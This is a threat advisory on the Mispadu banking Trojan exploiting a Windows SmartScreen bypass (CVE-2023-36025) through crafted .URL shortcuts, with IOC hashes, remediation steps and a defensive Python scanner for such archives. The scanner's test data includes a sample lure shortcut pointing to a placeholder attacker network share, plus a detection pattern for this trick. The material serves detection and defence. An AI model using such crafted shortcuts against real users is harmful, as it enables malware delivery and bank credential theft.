February 5, 2024
Severity
High
Analysis Summary
The Mispadu banking Trojan, known for targeting victims in Latin America, has been observed exploiting a now-patched Windows SmartScreen security bypass to compromise users in Mexico. Mispadu, first documented in 2019, is a Delphi-based information stealer that spreads through phishing emails and belongs to the broader family of Latin American banking malware that also includes Grandoreiro.
The attack chain starts with rogue internet shortcut (.URL) files inside bogus ZIP archives that exploit CVE-2023-36025, a high-severity security feature bypass in Windows SmartScreen that Microsoft patched in November 2023. Opening the crafted .URL file, or a hyperlink to it, retrieves a file from an attacker-controlled location without SmartScreen showing its usual warning: instead of a web URL, the shortcut references a network share hosting a malicious binary.
“The bypass is simple and relies on a parameter that references a network share, rather than a URL. The crafted .url file contains a link to a threat actor’s network share with a malicious binary,” researchers mentioned.
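The delivery pattern described above (ZIP archive containing a .URL file whose target is a network share rather than a web URL) is something a mail gateway or sandbox can check for directly. The following Python script is an added example, not code from the advisory or from the researchers quoted; it parses each .url member of an archive as the INI file it is, flags any whose URL= value is a UNC path or a file:// URL with a host component, and also compares every member's MD5/SHA-1/SHA-256 against the hash indicators listed under Indicators of Compromise below. The sample archive it builds is constructed for the demonstration: the host 203.0.113.10, the share name and the lure file name are placeholders, not indicators from the advisory.

```python
"""Added example (not from the advisory): scan a ZIP archive for .url files whose
target is a remote network share, and match archive members against IOC hashes."""
import configparser
import hashlib
import io
import re
import zipfile
from typing import Optional

# IOC hashes listed in this advisory (MD5, SHA-1, SHA-256), lower-cased for matching.
KNOWN_BAD = {h.lower() for h in (
    "723df0296951abd2aeed01361cec6b0d", "59698ce64c5af0473afd411bd774a5c4",
    "2e6dc0900407d61395896a63025fa417", "2112360f64fc1673da60f8a75d4935b7",
    "6ce43b5b2fe55e4120f2a07a704ba244", "baead7afa8294aa22c95db34b1fef8ec",
    "eae83f4faad9356919741fac5a1153f1",
    "ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad", "a4b223dd4b613c7d3e7fb899932486253c2197ab",
    "4f5589b054068a0d42a7752bf22fcf2603debd65", "47285d8372ca733ead51821a91c53b5e4c53c21b",
    "a9f6520a8de82c3d6e06c41317e126947a0fb553", "6788b8fef5b1a0f1b54b2112fe1b3c2d3678c513",
    "319feee9bd7908c77a11672c1e06b83b7201cfd4",
    "8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea",
    "bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789",
    "fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4",
    "46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52",
    "03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f",
)}

# A UNC path (\\host\share\...) or a file:// URL with a host component means the
# shortcut resolves its target over SMB/WebDAV instead of fetching an http(s) URL.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")
FILE_URL_RE = re.compile(r"^file://([^/\\]+)[/\\]", re.IGNORECASE)


def shortcut_target(data: bytes) -> Optional[str]:
    """Return the URL= value of an [InternetShortcut] file, or None if it is not one.
    Assumes the ANSI/UTF-8 encoding Windows normally writes for .url files."""
    parser = configparser.RawConfigParser(strict=False)  # tolerate duplicate keys, no % interpolation
    try:
        parser.read_string(data.decode("utf-8-sig", errors="replace"))
    except configparser.Error:
        return None
    for section in parser.sections():
        if section.lower() == "internetshortcut":
            return parser.get(section, "url", fallback=None)  # option names are case-insensitive
    return None


def is_remote_share(target: str) -> bool:
    """True when the shortcut target points at a network share instead of a web URL."""
    target = target.strip()
    return bool(UNC_RE.match(target) or FILE_URL_RE.match(target))


def file_digests(data: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 hex digests of a file's bytes."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def scan_zip(zip_bytes: bytes, bad_hashes: set) -> list:
    """Inspect every member of an in-memory ZIP; report IOC hash hits and .url
    files that target a remote share. Returns a list of finding dicts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            data = archive.read(info)
            hits = {algo: d for algo, d in file_digests(data).items() if d in bad_hashes}
            if hits:
                findings.append({"member": info.filename, "reason": "known-bad hash", "detail": hits})
            if info.filename.lower().endswith(".url"):
                target = shortcut_target(data)
                if target and is_remote_share(target):
                    findings.append({"member": info.filename,
                                     "reason": "shortcut targets remote share", "detail": target})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: one lure .url pointing at a placeholder UNC share
    (203.0.113.10 is a documentation address, not an indicator from the advisory),
    one benign text file and one .url with an ordinary https target."""
    lure = "\r\n".join(["[InternetShortcut]", r"URL=\\203.0.113.10\share\Factura.exe", "IconIndex=13", ""])
    benign = "\r\n".join(["[InternetShortcut]", "URL=https://example.com/", ""])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Factura.url", lure)
        archive.writestr("readme.txt", "benign text")
        archive.writestr("local.url", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip(), KNOWN_BAD):
        print(finding)
```

Run against the sample, only Factura.url is reported, for its UNC target; the https shortcut and the text file pass. In production the same check belongs wherever archives are unpacked before reaching users, and a .url whose target is a share you do not own is worth quarantining regardless of whether its hash is already known.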
Once launched, Mispadu checks the victim's geographic location and system configuration and proceeds only against its intended targets, then contacts a command-and-control server to exfiltrate stolen data. Spam campaigns distributing the malware have harvested over 90,000 bank account credentials since August 2022.
The same SmartScreen flaw has been exploited by several cybercrime groups in recent months to deliver DarkGate and Phemedrone Stealer. Mexico has been a prime target for campaigns delivering information stealers and remote access trojans; among them, the financially motivated group TA558, active since 2018, has attacked the hospitality and travel sectors across Latin America.
Separately, a detailed analysis has described the workings of DICELOADER, a custom downloader used by the Russian e-crime group FIN7 and delivered through malicious USB drives (BadUSB). DICELOADER sits in the same intrusion set's arsenal as the Carbanak RAT and uses sophisticated obfuscation to conceal its command-and-control IP addresses and network communications.
Researchers have also uncovered two new cryptocurrency mining campaigns that use booby-trapped archives and game hacks to deploy miners for Monero and Zephyr. Together these findings reflect a threat landscape in which cybercriminal groups keep refining their techniques for financial gain and data theft.
Impact
- Security Bypass
- Sensitive Information Theft
Indicators of Compromise
MD5
- 723df0296951abd2aeed01361cec6b0d
- 59698ce64c5af0473afd411bd774a5c4
- 2e6dc0900407d61395896a63025fa417
- 2112360f64fc1673da60f8a75d4935b7
- 6ce43b5b2fe55e4120f2a07a704ba244
- baead7afa8294aa22c95db34b1fef8ec
- eae83f4faad9356919741fac5a1153f1
SHA-256
- 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea
- bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789
- fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4
- 46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52
- 03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f
SHA-1
- ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad
- a4b223dd4b613c7d3e7fb899932486253c2197ab
- 4f5589b054068a0d42a7752bf22fcf2603debd65
- 47285d8372ca733ead51821a91c53b5e4c53c21b
- a9f6520a8de82c3d6e06c41317e126947a0fb553
- 6788b8fef5b1a0f1b54b2112fe1b3c2d3678c513
- 319feee9bd7908c77a11672c1e06b83b7201cfd4
Remediation
- Block all threat indicators at your respective controls.
- Search for the indicators of compromise (IOCs) listed above in your environment using your respective security controls.
- Apply Microsoft's November 2023 security update that addresses CVE-2023-36025 on all Windows endpoints, and keep all operating systems, software, and applications current with the latest security patches.
- Block or quarantine internet shortcut (.URL) files arriving as email attachments or inside archives, and restrict outbound SMB (TCP 445) and WebDAV traffic to the internet at the perimeter, since the crafted shortcuts retrieve their payload from attacker-controlled network shares.
- Conduct regular security awareness training so users can recognize and avoid phishing emails.
- Enable antivirus and anti-malware software and update signature definitions promptly. Multi-layered protection is necessary to secure vulnerable assets.
- Along with network and system hardening, implement code hardening within the organization so that websites and software are secure. Use testing tools to detect vulnerabilities in deployed code.
- Implement network segmentation to limit lateral movement within the network.
- Continuously monitor network traffic and endpoint activity to detect unusual or suspicious behavior.
- Develop and regularly test an incident response plan to ensure a swift and effective response to a security incident.
- Implement a SIEM solution to centralize log collection and analysis; this helps identify patterns of suspicious behavior and provides timely alerts for potential security incidents.
- Regularly back up critical data and ensure that the backup copies are stored securely.